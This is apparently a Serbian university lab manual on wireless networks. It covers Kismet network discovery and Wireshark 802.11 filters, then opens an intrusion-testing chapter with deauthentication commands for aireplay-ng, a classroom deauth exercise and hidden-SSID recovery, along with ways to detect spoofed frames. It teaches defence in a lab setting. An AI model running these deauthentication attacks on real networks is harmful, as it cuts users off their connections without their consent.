82 V Вежба Активност 5: Покретање Kismet програма Програм Kismet на BackTrack Linux-у можемо покренути преко графичког корисничког окружења: Start / Backtrack / Radio Network Analysis / / All / Kismet или можемо отворити конзолу и откуцати команду kismet, затим притиснути тастер Enter. Прочитати поруке које ће серверска компонента програма приказати (слика 5.1). Слика 5.1 : Почетни екран Kismet програма Програм ће нас обавестити да није одабран мрежни адаптер који ће се користити за сакупљање пакета, и понудиће нам опцију за одабир жељеног адаптера. Ми ћемо додати адаптер wlan0 и затим одабрати опцију [Add], а програм ће га аутоматски пребацити у монитор режим рада (слика 5.2). Слика 5.2 : Одабир мрежног адаптера 74

83 Бежични комуникациони системи Затим ћемо отворити клијентску компоненту програма која ће почети да прима од сервера податке у реалном времену. На слици 5.3 приказан је прозор клијентске компоненте. Слика 5.3 : Клијентска компонента програма Kismet Програм ће убрзо приказати откривене бежичне мреже. Почетни приказ назива се autofit и није погодан за даљи рад. Можемо да извршимо сортирање детектованих бежичних мрежа одабиром опције Sort (слика 5.4). Слика 5.4 : Сортирање резултата 75

84 V Вежба Сортирати детектоване мреже према идентификатору скупа сервиса. Колико мрежа је детектовано? На почетном екрану клијентске компоненте дат је приказ детектованих бежичних мрежа, а подаци о мрежама разврстани су у неколико колона ради лакшег прегледа. Главни прозор клијентске компоненте састоји се од неколико колона са одређеним информацијама, у даљем тексту ће бити описане неке од најзначајнијих. На слици 5.5 приказане су неке од информација. Слика 5.5 : Приказ информација о детектованим мрежама Крајња лева колона симболично приказује активност на мрежи. Колона нема свој наслов у заглављу па ју је можда мало теже уочити на почетку. У програму Kismet може се подесити контролна јединица времена на основу које ће програм да одређује ниво активности одређене мреже. Та јединица се може подесити у kismet_ui.conf конфигурационој датотеци, има ознаку decay и подешена је на 3 секунде по подразумеваним подешавањима. Активне мреже означавају се знаком узвика!, што значи да је мрежа била активна за време контролне јединице времена (активна у задње 3 секунде), уочити на слици 5.5 мрежу HiHaHo ; Скорашње мреже означавају се тачком.. То су мреже које су активне у периоду од две контролне јединице времена (активне у задњих 6 секунди), уочити на слици 5.5 мрежу energetics ; Неактивне мреже немају никакву ознаку. Такве мреже нису биле активне у року од неколико контролних јединица времена (нису биле активне дуже од 6 секунди), уочити на слици 5.5 мрежу rakac. Следећа колона пружа преглед идентификатора скупа сервиса (SSID) детектованих мрежа. У случају да мрежа не шаље своју ознаку у Beacon оквиру (тзв. маскирање SSID-a cloaking SSID), а програм ипак успе да детектује мрежу, поставиће <no ssid> ознаку. Колона са ознаком Т означава врсту мреже: A (Access Point) мрежа са приступном тачком. D (Data Network) мреже које су детектоване али се још не може утврдити тип мреже који се користи. 76

85 Бежични комуникациони системи H (Ad-hoc) мреже које су конфигурисане за рад у Ad-hoc режиму рада. P (Probe Request) клијент који покушава да се придружи некој приступној тачки. Колона са ознаком Ch означава број канала које детектована мрежа користи: за b/g мреже, ознаке канала могу бити у опсегу 1-13 (1-14 у Јапану); за а мреже, ознаке канала могу бити 36, 40, 44, 48, 52, 56, 60,64, 149, 153, 157 и 161. Колона са ознаком Pkts даје информацију о броју ухваћених пакета одређене мреже. Док колона са ознаком Size даје информацију о укупној величини ухваћених пакета. Како би нам олакшао праћење детектованих мрежа, Kismet користи боје како би пружио одређене информације. Значење боја можемо подешавати у конфигурационој датотеци програма. По подразумеваним подешавањима: Мреже означене жутом бојом означавају да се не користе WEP или WPA протоколи за заштиту саобраћаја. Црвеном бојом се означавају мреже које су детектоване да нису промениле фабричка подешавања на уређајима које користе за приступне тачке. Мреже означене зеленом бојом користе неку врсту заштите саобрађаја. Плавом бојом се означавају мреже које скривају свој идентификатор скупа сервиса (SSID). Поред главног прозора који смо видели програм омогућава и низ помоћних прозора који садрже додатне информације о жељеним мрежама. Прозор који нам даје детаљне информације о мрежи приказан је на слици 5.6. До прозора се долази тако што се у главном прозору одабере мрежа и затим притисне тастер Enter или i. 77

86 V Вежба Слика 5.6 : Приказ детаљних информација Програм Kismet нам омогуђава да видимо и клијенте који се налазе у одређеној мрежи. Приказ клијената можемо видети одабиром жељене мреже и одабиром опције Client list која се налази у оквиру Windows падајуће листе. Приказ клијената за одређену мрежу дат је на слици 5.7. Слика 5.7 : Приказ клијената једне бежичне мреже Програм може дати информације и о односу сигнал/шум као и количину саобраћаја по каналима одабиром опције Channel details која се налази у оквиру Windows падајуће листе. Слика 5.8 даје приказ ове опције. 78

87 Бежични комуникациони системи Слика 5.8 : Однос сигнал/шум и заузетост канала Kismet скенира све канале и врши детекцију доступних мрежа. У случају када желимо да скенирамо мрежни саобраћај на тачно одређеној фреквенцији (каналу) потребно је извршити додатно подешавање програма. Одабиром опције Configure channel која се налази у оквиру Kismet падајуће листе можемо подесити жељени канал (слика 5.9) на коме ћемо вршити детекцију мрежног саобраћаја. Може се подесити и време за које ће програм скенирати сваки канал (dwell опција). Слика 5.9 : Одабир канала за скенирање Док је трајало ослушкивање саобраћаја серверска компонента програма је у дневничке фајлове записивала снимак саобраћаја. Снимак се записује у неколико формата. У оквиру вежби погледаћемо dump формат који се може увести у програм Wireshark. 79

88 V Вежба Активност 6: Детекција бежичних мрежа Kismet програмом Покренути Kismet програм. Подесити одговарајући мрежни интерфејс који је у монитор режиму рада за праћење мрежног саобрађаја у програму. Колико мрежа је детектовано? Упоредити резултат са суседним колегом. Мреже сортирати према броју канала. Погледати детаље мрежа viser и labnet. Погледати листу клијената који су повезани на ове две мреже. Колико клијената је детектовано? Упоредити резултат са суседним колегом. Погледати однос сигнал/шум на каналима. Снимак саобрађаја увести у програм Wireshark. 5.5 Напредно коришћење Wireshark програма за анализу мрежног саобраћаја На претходним вежбама имали сте прилику да уочите колико је интензиван бежични мрежни саобрађај и да за веома кратко време можемо прикупити велики број пакета. Како би нам олакшао анализу пакета Wireshark нам пружа могућност примене пре-филтера (Capture filters) и пост-филтера (Disply Filters). Пре-филтери имају велику примену при сакупљању пакета у бежичним мрежама јер нам омогућавају да снимимо само нама интересантне пакете и на тај начин смањимо саму величину датотеке у којој се налази прикупљени мрежни саобраћај. У тексту који следи биће приказано неколико корисних филтера за анализу бежичног мрежног саобраћаја. Wireshark врши филтрирање пакета на основу информација које се налазе у заглављу IEEE оквира, тако да је корисно знати која поља поседује заглавље као и њихову намену (за детаље погледати последње поглавље ове вежбе). 5.6 Филтрирање саобраћаја на основу идентификатора основног скупа сервиса Свака бежична приступна тачка је једнозначно идентификована са идентификатором основног скупа сервиса (BSSID). BSSID представља MAC адресу бежичне приступне тачке. Када поставимо мрежни адаптер да ради у монитор режиму рада, он ће детектовати мрежни саобраћај свих бежичних приступних тачака које раде на посматраној фрекванцији. Када анализирамо саобраћај са циљем отклањања неког проблема, корисно је изоловати пакете намењене одређеној бежичној приступној тачки. То се лако постиже применом следећег филтера: wlan.bssid eq <MAC адреса приступне тачке> 80

89 Бежични комуникациони системи 5.7 Филтрирање саобраћаја на основу MAC адресе рачунара Када желимо да изолујемо саобраћај који потиче од одређеног рачунара можемо применити следећи филтер (претпостављамо да је MAC адреса рачунара 00:09:5b:e8:c4:03): wlan.sa eq 00:09:5b:e8:c4:03 MAC адресу рачунара можемо видети уз помоћ команде ipconfig/all или getmac (код Windows оперативних система), односно уз помоћ команде ifconfig (код Linux оперативних система). Можемо користити и комбинацију два претходна филтера како бисмо изоловали саобраћај између одређене станице и бежичне приступне тачке, нпр: wlan.bssid eq 00:11:92:6e:cf:00 and wlan.sa eq 00:09:5b:e8:c4: Филтрирање контролних и управљачких оквира Можемо примењивати филтере на управљачке и контролне оквире. Тај начин филтрирања добијамо комбинацијом type и subtype поља у заглављу IEEE оквира. Ако желимо да подесимо Wireshark да нам не детектује Beacon оквире, прво треба да знамо којег су типа и подтипа Beacon оквири. Тип Подтип Опис Контролни 10 Штедња енергије(ps)-poll Контролни 11 Захтев за слање(rts) Контролни 12 Спреман за слање(cts) Контролни 13 Потврда пријема(ack) Контролни 14 Режим без надметања (CF)-End Контролни 15 CF-End + CF-Ack Табела 5.1 : Подтипови контролних оквира Тип Подтип Опис Управљачки 0 Асоцијација-захтев Управљачки 1 Асоцијација-одговор Управљачки 2 Поновна асоцијација-захтев Управљачки 3 Поновна асоцијација-одговор Управљачки 4 Проба-захтев Управљачки 5 Проба-одговор Управљачки 8 Beacon оквир Управљачки 10 Деасоцијација Управљачки 11 Аутентификација Управљачки 12 Деаутентификација Табела 5.2 : Подтипови управљачких оквира Из приказаних табела можемо видети да Beacon оквир спада у управљачке оквире (type=00), и да је ознака подтипа 8 (subtype=00). Све што треба да урадимо је да имплементирамо следећи филтер:!(wlan.fc.type eq 0 and wlan.fc.subtype eq 8) 81

90 V Вежба Знак узвика означава негацију (инвертовање) тако да ће нам програм сада приказати све детектоване пакете осим Beacon оквира. Да би нам олакшао рад, Wireshark је омогућио примену филтера који аутоматски комбинују type и subtype поља у заглављу. Овај филтер можемо користити уместо гореприказаног филтера који смо користили да бисмо избацили Beacon оквире. Добијамо знатно краћи и једноставнији филтер: wlan.fc.type_subtype ne 8 У табели 5.3 дате су ознаке које се користе код овог типа филтера. 5.9 Филтрирање пакета података Изузимање Beacon оквира из снимка саобраћаја знатно ће редуковати количину снимљених пакета, али ће још увек остати велики број управљачких или контролних пакета. У случају да желимо да испитамо само пакете који носе корисничке податке сви остали пакети су нам сувишни. Можемо користити следећи филтер када желимо да изолујемо само оквире са подацима: wlan.fc.type_subtype eq 32 Ако је овај филтер сувише рестриктиван за потребе наше анализе можемо користити следећи филтер: wlan.fc.type eq 2 Овај филтер приказује ширу палету оквира са подацима, као што су ICMP пакети (ping), NULL пакете података, итд Детекција незаштићених података Још једна од техника за анализирање саобраћаја у бежичним мрежама је идентификовање пакета података који се шаљу незаштићени (нису шифровани). На тај начин можемо видети да ли смо направили неки пропуст код подешавања наших бежичних уређаја. У заглављу IEEE оквира налази се посебан protected bit који има вредност 1, када се користи неки од механизама за шифровање података (WEP,TKIP или CCMP). Следећи филтер можемо искористити за приказ незаштићеног мрежног саобраћаја: wlan.fc.protected ne 1 Овако написан филтер приказаће и незаштићене управљачке и контролне оквире. Ако желимо да прикажемо само незаштићене податке можемо употребити следећу комбинацију филтера: wlan.fc.protected ne 1 and wlan.fc.type eq 2 82

91 Бежични комуникациони системи Активност 7: Напредна анализа ухваћеног саобраћаја Покрените Wireshark програм. Подесите одговарајући мрежни интерфејс који је у монитор режиму рада за праћење мрежног саобрађаја. Направите снимак саобраћаја у трајању од 300 секунди. Испробајте типове филтрирања о којима је било речи у овој вежби. Ознаке филтера за изолацију пакета на основу типа/подтипа оквира: Тип Оквира/Подоквира Филтер Management frames wlan.fc.type eq 0 Control frames wlan.fc.type eq 1 Data frames wlan.fc.type eq 2 Association request wlan.fc.type_subtype eq 0 Association response wlan.fc.type_subtype eq 1 Reassociation request wlan.fc.type_subtype eq 2 Reassociation response wlan.fc.type_subtype eq 3 Probe request wlan.fc.type_subtype eq 4 Probe response wlan.fc.type_subtype eq 5 Beacon wlan.fc.type_subtype eq 8 Announcement traffic indication map (ATIM) wlan.fc.type_subtype eq 9 Disassociate wlan.fc.type_subtype eq 10 Authentication wlan.fc.type_subtype eq 11 Deauthentication wlan.fc.type_subtype eq 12 Action frames wlan.fc.type_subtype eq 13 Block ACK Request wlan.fc.type_subtype eq 24 Block ACK wlan.fc.type_subtype eq 25 Power-Save Poll wlan.fc.type_subtype eq 26 Request to Send wlan.fc.type_subtype eq 27 Clear to Send wlan.fc.type_subtype eq 28 ACK wlan.fc.type_subtype eq 29 Contention Free Period End wlan.fc.type_subtype eq 30 Contention Free Period End ACK wlan.fc.type_subtype eq 31 Data + Contention Free ACK wlan.fc.type_subtype eq 33 Data + Contention Free Poll wlan.fc.type_subtype eq 34 Data + Contention Free ACK wlan.fc.type_subtype eq 35 + Contention Free Poll NULL Data wlan.fc.type_subtype eq 36 NULL Data + Contention Free ACK wlan.fc.type_subtype eq 37 NULL Data + Contention Free Poll wlan.fc.type_subtype eq 38 NULL Data + Contention Free ACK wlan.fc.type_subtype eq 39 + Contention Free Poll QoS Data wlan.fc.type_subtype eq 40 QoS Data + Contention Free ACK wlan.fc.type_subtype eq 41 QoS Data + Contention Free Poll wlan.fc.type_subtype eq 42 QoS Data + Contention Free ACK wlan.fc.type_subtype eq 43 + Contention Free Poll NULL QoS Data wlan.fc.type_subtype eq 44 83

92 V Вежба NULL QoS Data + Contention Free Poll wlan.fc.type_subtype eq 46 NULL QoS Data + Contention Free ACK wlan.fc.type_subtype eq 47 + Contention Free Poll Табела 5.3 : Филтери за изолацију пакета на основу типа/подтипа оквира 5.11 Додатак IEEE заглавље На слици испод дат је графички приказ заглавља пакета. Слика 5.10 : IEEE заглавље У табели 5.4 су наведена поља као и њихова намена, и филтери Wireshark програма који се могу користити. Ознака поља Опис поља Ознака филтера Frame Control Контрола оквира је поље величине 2 бајта и налази се на почетку заглавља. Као што се може видети на слици изнад, ово поље се дели на 11 поља која имају своја значења. Version Ово поље представља верзију стандарда који се користи. По тренутном стандарду ово поље увек носи ознаку 0. wlan.fc wlan.fc.version Type Subtype Поље Тип одређује тип оквира, да ли се ради о управљачком, контролном или оквиру података. Подтип означава подврсте горенаведених типова оквира. На пример ако је оквир управљачког типа, ово поље означава подврсту управљачког оквира (beacon frame, authenticate request, disassociate wlan.fc.type wlan.fc.subtype 84

93 Бежични комуникациони системи DS status More Fragments Retry Power Management More Data Protected Order notice, frame, authenticate request, disassociate notice...). Поља To DS и From DS одређују смер кретања оквира. Ако је поље From DS=1 а поље To DS=0, оквир путује од приступне тачке ка клијентима. Ако је поље From DS=0 а поље To DS=1, оквир путује од клијента ка приступној тачки. У случају да оба поља имају вредност нула, ради се о размени података у Ad-hoc мрежи. Када оба поља имају вредност један, оквир путује између две приступне тачке. Ово поље указује на постојање додатних фрагмената који морају да се приме пре него што се цео оквир искористи. Ово поље није у честој употреби. Ово поље је активно када указује да се врши поновно слање оквира за кога се није примила потврда о успешном пријему. Поље се користи када станица планира да оде у стање чувања енергије, и самим тим не учествује у размени података на мрежи. Ово поље је активно када приступна тачка обавештава клијента да има још података које је сачувала (баферовала) за њега док је он био у режиму уштеде енергије. Овај бит користи приступна тачка како би указала да се користи нека врста шифровања садржаја оквира. Ово поље указује да слање оквира треба да се одради по стриктном редоследу. Ово поље није у честој употреби. wlan.fcds wlan.fc.flag wlan.fc.retry wlan.fc.pwrmgmt wlan.fc.moredata wlan.fc.protected wlan.fc.order 85

94 V Вежба Duration Ово поље има две функције. У највећем броју случајева у ово поље се уписује предвиђено време у микросекундама које је потребно за слање одређеног оквира. Када је станица у процесу асоцијације са приступном тачком ово поље носи идентификатор асоцијације. wlan.duration Ознака поља Опис поља Ознака филтера Address У зависности од типа оквира, користи се различит број адреса. Контролни оквири садрже само једно адресно поље (адресу примаоца или пошиљаоца), док управљачки оквири или оквири података садрже три адресе (адресу примаоца, адресу пошиљаоца и BSSID). Бежичне мреже које повезују више бежичних мрежа користе четири адресе. wlan.da (destination), wlan.sa (source), wlan.bssid (BSSID), wlan.ra (receiver) Fragment Number Ово поље означава серијски број фрагмента у случају да се користи фрагментација оквира. На основу ових бројева пријемна страна би саставила фрагментовани оквир по тачном редоследу. wlan.frag Sequence Number Секвенцни број је поље које се користи за идентификацију оквира и почиње од нуле. Станица инкрементира вредност овог поља за сваки пакет који пошаље. Када вредност достигне број 4095, почиње се опет бројање од нуле. Ово поље је јако важно код детекције упада у бежичну рачунарску мрежу. wlan.seq Табела 5.4 : Опис поља IEEE заглавља 86

95 VI ВЕЖБА ТЕСТИРАЊЕ УПАДА У ЛОКАЛНЕ БЕЖИЧНЕ РАЧУНАРСКЕ МРЕЖЕ Циљ вежбе је упознавање студената са врстама и техникама упада у бежичне рачунарске мреже као и њихово детектовање. Поред теоријске основе везане за врсте напада, студенти ће и практично испробати неке од њих, а све у циљу стицања знања заштите од истих.

96 VI Вежба 6. Тестирање упада у локалне бежичне рачунарске мреже 6.1 Увод Бежичне мреже имају карактеристике које их чине темељно различитим од традиционалних жичних мрежа. Значајне карактеристике физичког слоја IEEE мрежа, у којима се оне разликују од традиционалних жичних мрежа су: Користи се медијум који нема апсолутне нити јасно видљиве границе ван којих станице не могу поуздано да примају мрежне оквире. Користи се медијум који није заштићен од спољњих сигнала. Медијум је значајно мање поуздан од физичког слоја ожичених мрежа. Медијум има динамичну топологију. Недостатак пуне повезаности, тако да уобичајена претпоставка да свака станица може да чује било коју другу не важи. Пропагациона својства су асиметрична и мењају се са временом. Ова својства медијума чине да је и обезбеђивање сигурности података у бежичном окружењу много сложеније него у жичном окружењу. Отворена природа радио-таласа омогућује велики број различитих напада на мрежу. Без заштите, бежичне мреже су несигурне и осетљиве на те нападе. Пре започињања теста упада у бежичну мрежу важно је разумети њене недостатке и рањивости. Стандард за бежичне мреже, , развијен је као "отворени" стандард. Другим речима, када је био писан примарни циљ је био остварити једноставан приступ и повезивање. Сигурносни механизми имали су споредну улогу и и нису пројектовани на најбољи начин. Иако данас постоје многи механизми заштите, мало је оних који нуде сигурно решење. Рањивости бежичних мрежа могу се сврстати у две групе: рањивости због лоше конфигурације, рањивости због слабе енкрипције. Лоша конфигурација (poor configuration) најчешћи је разлог рањивости у бежичним мрежама. Инфраструктура бежичне мреже једноставно се поставља. Због ове чињенице, сигурносна подешавања су често или делимично имплементирана или потпуно изостављена. Слична ситуација јавља се када су коришћене неадекватне мере заштите (poor encryption). До овакве врсте пропуста долази коришћењем једноставних лозинки и превазиђених алгоритама за шифровање. Овакви пропусти се јављају због лоше информисаности администратора рачунарских мрежа. Наредне вежбе у којима ће се тестирати упади у бежичне рачунарске мреже, обезбедиће степен информисаности који ће омогућити будућим администраторима да избегну овакве грешке. 88

97 Бежични комуникациони системи 6.2 DoS (denial-of-service) напади у бежичним рачунарским мрежама DoS напад или напад са ускраћивањем услуге, покушај је спречавања легалних корисника да користе ресурсе одређеног рачунарског система. Због карактеристика медијума који користе за пренос података, бежичне рачунарске мреже су подложне широком спектру DoS напада. Ометање на физичком нивоу OSI референтног модела врши се тако што се емитује јак сигнал према пријемној антени. Тај сигнал мора бити емитован на истом опсегу учестаности, или подопсегу, као и сигнал који емитује и предајник у регуларној комуникацији. Битно је напоменути да ово ометање не утиче на предајник већ само на пријемник са друге стране комуникационог линка. Ометање је успешно када ометачки сигнал довољно уништи корисност комуникационог линка, односно када користан сигнал буде неупотребљив. У дигиталним комуникацијама то се постиже када вероватноћа грешке превазилази дозвољени проценат, тј. када механизми за отклањање грешака постају неефикасни. Успешно ометање подразумева да је ниво снаге ометачког сигнала једнак или већи од нивоа снаге корисног сигнала на пријемној страни. Ефекат ометачког напада зависи од односа jamming-to-signal (J/S), типа модулације, кодирања канала који се примењује на систему који се омета. Ако ометач нема довољан ниво излазне снаге да емитује ометачки сигнал у широком опсегу континуално, онда се прибегава принципу импулсног ометања пуном снагом. Приликом импулсног ометања, омета се такође широки опсег фреквенција, али део по део у кратким временским интервалима. J/S однос, ако се занемаре пропагацијски ефекти, може да се израчуна према следећем изразу: где су: Pj - снага предајника ометача, Pt - снага регуларног предајника, Gjr - добитак антене - ометач пријемник, Grj - добитак антене - пријемник ометач, Grt - добитак антене - пријемник предајник, Gtr - добитак антене - предајник пријемник, Br - ширина опсега пријемника, Bj - ширина опсега предајника ометача, Rtr - растојање предајник пријемник, Rjr - растојање ометачки предајник пријемник, Lj - слабљење сигнала ометача, Lr - слабљење регуларног сигнала. Према наведеном изразу види се да ERP (Effective Radiated Power) ометача, који је производ добитка антене и излазне снаге, треба да је што већи ако се жели што ефикасније ометање. С 89

98 VI Вежба друге стране, у циљу заштите од ометања, добитак антене према комуникационом партнеру треба да је што већи, а према ометачу што мањи. Према изразу, модел антене је врло битан фактор приликом ометања. Растојање између предајника и пријемника има велики утицај на слабљење сигнала. Ако се ометач налази на два пута већем растојању од пријемника, он мора да има четири пута већи излазни ниво да би код пријемника имао исти ниво као и користан сигнал. Чињеница да WLAN користи високе фреквенције са врло слабим излазним нивоом, чини врло тешким, ако не и немогућим, ометање система унутар неке зграде, ако се ометач налази ван зграде. С друге стране, приступне мреже WLAN типа на отвореном простору, врло су подложне ометањима. Могуће је да се WLAN унутар зграде омета тако што се инсталира мали ометачки уређај у жељеној просторији. Ометач се подеси тако да започиње ометање у одређеном временском тренутку или може даљински да се активира. Проналажење оваквог, добро скривеног ометача, представља велики проблем без употребе ореме за детекцију правца ометања или бар спектралног анализатора. И наравно, ако се ометање овог типа врши пажљиво, ометање ће се тешко детектовти. Поред физичког слоја могу се вршити напади ометањем и на другом слоју OSI референтног модела. DoS напад слањем оквира за деаутентификацију Код инфраструктурног режима рада бежичних рачунарских мрежа, клијент мора да се асоцира са бежичном приступном тачком пре него што почне размена података. Када клијент жели да напусти мрежу он ће послати приступној тачки оквир за деаутентификацију. Слично томе, када приступна тачка жели да прекине везу са клијентима (нпр. када се уређај поново покреће након неких промена у конфигурацији), она ће послати оквир за деасоцијацију свим клијентима. У тренутној верзији стандарда, оквири за деаутентификацију и деасоцијацију шаљу се незаштићени (нису шифровани). Ова чињеница може да се искористи за успешно пласирање DoS напада. Наиме, нападач може да репродукује оквир за деаутентификацију или деасоцијацију у коме подеси жељене MAC адресе клијента и приступне тачке. Када клијент прими овај прерађени оквир за деаутентификацију, аутоматски прекида везу (конекцију) са приступном тачком и покушава да поново обнови прекинуту везу. Иако су оквири за деасоцијацију и деаутентификацију слични, много већу ефикасност има слање оквира за деаутентификацију, јер сеу том случају мора извршити поновна размена кључева како би се обновила веза. DoS напад деаутентификацијом нападачи најчешће користе за: откривање сакривеног идентификатора скупа услуга (cloаked SSID); детектовање и прислушкивање WPA/WPA2 аутентификације; генерисање ARP захтева, што се може користити код напада на WEP протокол. Windows клијенти понекад обришу своје ARP табеле када раскидају везу са мрежом disconnect 90

99 Бежични комуникациони системи Наравно, ови напади немају никаквог ефекта ако не постоје клијенти који су асоцирани са бежичном приступном тачком. Један од најпопуларнијих алата за извођење овакве врсте напада је алат aireplay-ng. Да бисмо могли да генеришемо жељене оквире за деаутентификацију, драјвери бежичне мрежне картице морају да подржавају могућност убацивања (injection) пакета док раде у монитор режиму рада. Тестирање ове опције такође се може извршти уз помоћ алата aireplay-ng. Активност 1: Тестирање могућности адаптера за убацивање пакета Тестирање могућности адаптера за убацивање пакета. Поставити бежичну мрежну картицу у монитор режим рада: Отворити терминалску конзолу: Start / System / Konsole Унети следећу команду: airmon-ng start wlan0 Проверити да ли је креиран адаптер који ради у монитор режиму рада употребом команде: iwconfig Ако је успешно креиран нови адаптер, унети команду: aireplay-ng Погледати понуђене опције овог алата. Како бисмо тестирали могућност убацивања пакета, унети следећу команду aireplay-ng -9 mon0 - опција -9 указује да користимо опцију за тестирање aireplay-ng алата, - опција mon0 представља ознаку мрежног адаптера који ради у монитор режиму рада. Ако адаптер подржава опцију убацивања пакета, добићете одзив система сличан приказаном: 16:29:41 mon0 channel: 9 16:29:41 Trying broadcast probe requests... 16:29:41 Injection is working! 16:29:42 Found 5 APs Након што је утврђено да бежични адаптер подржава опцију убацивања пакета, можемо пласирати оквире за деаутентификацију: aireplay-ng a 00:14:6C:7E:40:80 -c 00:0F:B5:AE:CE:9D mon0 Где је: опција -0 указује да користимо опцију за генерисање оквира за деаутентификацију aireplay-ng алата; опција 1 означава број покушаја деаутентификације. Ако се постави вредност 0, оквири за деаутентификацију ће се слати континуално без прекида; опција -a 00:14:6C:7E:40:80 представља MAC адресу приступне тачке; 91

100 VI Вежба опција -с 00:0F:B5:AE:CE:9D представља MAC адресу клијента којег желимо да деаутентификујемо, ако се ова опција не унесе сви клијенти ће бити деаутентификовани; опција mon0 представља ознаку мрежног адаптера који ради у монитор режиму рада. Типичан одзив система након успешне деаутентификације жељеног клијента био би: 10:01:45 Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 1 10:01:45 Sending 64 directed DeAuth. STMAC: [00:0F:B5:AE:CE:9D] [ ACKs] Када уз помоћ aireplay-ng алата вршимо директну деаутентификацију жељеног клијента, aireplay-ng шаље 128 оквира за деаутентификацију за сваки покушај. У овом случају се клијенту и бежичној тачки шаље по 64 оквира. Податак [61 63 ACKs], који нам је приказан у одзиву система има следеће значење: [број ACK оквира примљених од клијента број ACK оквира примљених од бежичне приступне тачке]; у примеру описаном у Активности 1 види се да је број потврда о пријему мањи од очекиваног, јер је чест случај да се у бежичним мрежама изгуби пар пакета; уз помоћ ових информација можемо видети да ли је клијент детектовао послате пакете. Ако је број потврда о пријему пакета мали, вероватно се налазимо далеко од жељеног клијента или је сигнал који се шаље јако слаб. Како би открили MAС адресе клијента и приступне тачке, као и фреквенцију на којој ови уређаји комуницирају, можемо користити програме као што су Kismet или airodump-ng. Активност 2: Деаутентификација бежичних клијената Ова активност ће се радити у пару. Подесити приступне тачке на следећи начин: - SSID spec_lab1 (односно, spec_lab2, spec_lab3, итд...) - поставити канал број 1 (односно канал број 6, 11, итд...) - статички подесити адресе за интернет конекцију: - IP адреса: /24 - Default gataway: /24 - DNS сервер: Учесник 1 који ће представљати клијента треба да подеси свој бежични мрежни адаптер да ради у Manager режиму рада. Ако је мрежни адаптер био подешен за монитор режим рада треба извршити следећу команду: airmon-ng stop mon0 Затим треба да изврши асоцијацију са приступном тачком: iwconfig wlan0 essid <SSID> Потребно је подесити wlan0 адаптер да ради као DHCP клијент: 92

101 Бежични комуникациони системи dhclient wlan0 Отворити интернет претраживач и тестирати доступност Интернета. Како би имали увид у стање везе између клијента и бежичне приступне тачке, користићемо следећу команду: ping <IP > Учесник 2 који ће симулирати нападача треба да подеси мрежни адаптер у монитор режим рада. Са програмом airodump-ng погледати доступне бежичне приступне тачке и њихове клијенте. airodump-ng mon0 Покренути Wireshark програм и подесити снимање мрежног саобраћаја на mon0 адаптеру. Уочити MAC адресе жељене приступне тачке и клијента и започети напад деаутентификацијом: aireplay-ng a < > -c < > mon0 На рачунару који симулира клијента проверити стање везе са бежичном приступном тачком. Да ли је дошло до прекида везе? Детекција покушаја деаутентификације Управљачки оквири као и оквири података у мрежама, у свом заглављу носе ознаку SN. SN представља поље од 12 битова и служи за нумерисање фрагмената великих пакета. Код првог послатог оквира поље SN има вредност нула. Код сваког следећег оквира ова вредност се инкрементира, све док не дође до броја Након ове вредности поново почиње бројање од нуле. На слици 6.11 могу се уочити вредности SN поља (599, 600, 601 и 602). 93

102 VI Вежба Слика 6.1 : Вредност SN поља код узастопно послатих оквира На слици 6.2 треба уочити пакете са редним бројевима 45 и 46. Они представљају оквире за деаутентификацију и деасоцијацију, које је приступна тачка послала свим клијентима (одредишна адреса је бродкаст 23 - упућена свима). Али ако се мало боље погледају вредности SN поља може се увидети да пакети са исте MAC адресе не иду по очекиваном редоследу. Код пакета са редним бројем 44 и 47, вредности SN поља су 637 и 638, респективно. После њих можемо уочити оквире за деаутентификацију и деасоцијацију који су послати са исте MAC адресе као и претходна два пакета али вредности у SN пољима су 1957 и 1958, респективно. 23 Broadcast 94

103 Бежични комуникациони системи Слика 6.2 : Пример убачених оквира од стране уљеза у мрежи На основу ове чињенице можемо закључити да оквире за деаутентификацију и деасоцијацију није послала легитимна приступна тачка, већ су они послати од стране уљеза у мрежи. Овај концепт надгледања вредности SN поља користе програми за детекцију упада у мрежу 24. Активност 3: Анализа детектованог мрежног саобраћаја Проучити пакете које је снимио програм Wireshark током напада деаутентификацијом. 6.3 Скривање идентификатора скупа услуга Бежичне мреже могу радити у тзв. прикривеном режиму рада 25. У оваквом режиму рада идентификатор скупа услуга (SSID) не шаље се у beacon оквирима, нити овако подешене приступне тачке одговарају на Probe оквире код којих је одредишна адреса бродкаст адреса. У наредном примеру биће приказано зашто овакав вид заштите није довољно сигуран када се користи самостално, без других механизама сигурности. Наиме, вредност идентификатора SSID не налази се само у beacon оквирима, већ ту вредност користе и многи други оквири који се размењују у бежичном мрежном саобраћају. На пример, када клијент жели да успостави везу са бежичном приступном тачком, он шаље Аssociаtion 24 Intrusion Detection Software - IDS 25 Hidden, cloaked mode 95

104 VI Вежба request оквир у коме се налази SSID. То значи да сваки легитимни клијент у мрежи шаље SSID ознаку, нешифровану, сваки пут када жели да се повеже на бежичну мрежу. Пасивним скенирањем саобраћаја уз помоћ алата као што је Kismet, може се лако доћи до вредности скривеног SSID идентификатора. Најбржи начин да сазнамо вредност скривеног SSID-a је да легитимног корисника искључимо са мреже. У ту сврху може се користити напад са оквирима за деаутентификацију који је описан у претходном одељку ове вежбе. Пре деаутентификације легитимног клијента треба покренути програм за снимање мрежног саобраћаја како би снимили (ухватили) потребне оквире који садрже у себи SSID ознаку. Чак и ако се у мрежи користи неки од протокола за шифровање то неће помоћи, јер се управљачки оквири шаљу без шифровања. Циљ w амандмана је да онемогући врсту напада која је објашњена. Оквири за деаутентификацију нису захтев већ више представљају обавештење, али бежичне станице у стандарду нису могле да одбију деаутентификационе оквире w ће омогућити станицама да одбију деаутентификационе оквире ако они не задовољавају проверу интегритета w се може користити једино када се у мрежи користи CCMP/AES заштита. Активност 4: Откривање скривеног идентификатора скупа услуга Подесити бежичну приступну тачку да не шаље SSID са Вeacon оквирима (за детаље погледати упутство у IV вежби). Променити SSID ознаку. Повезати један рачунар на креирану бежичну мрежу. Скенирањем саобраћаја треба утврдити МАС адресе приступне тачке и клијента. Покренути Wireshark програм и подесити снимање мрежног саобраћаја на mon0 адаптеру. Уочити MAC адресе жељене приступне тачке и клијента и започети напад деаутентификацијом. Прегледати снимљене пакете, потребно је применити филтер који ће приказати Рrobe request оквире који потичу од клијента који је био жртва напада. У параметрима оквира пронаћи скривену SSID ознаку. Кoja је вредност скривене SSID ознаке? 6.4 Филтрирање MAC адреса клијената Уређаји који функционишу као бежичне приступне тачке подржавају опцију контроле приступа по MAC адресама. Уређај би требало подесити тако да занемарује све пакете који су послати са MAC адреса које 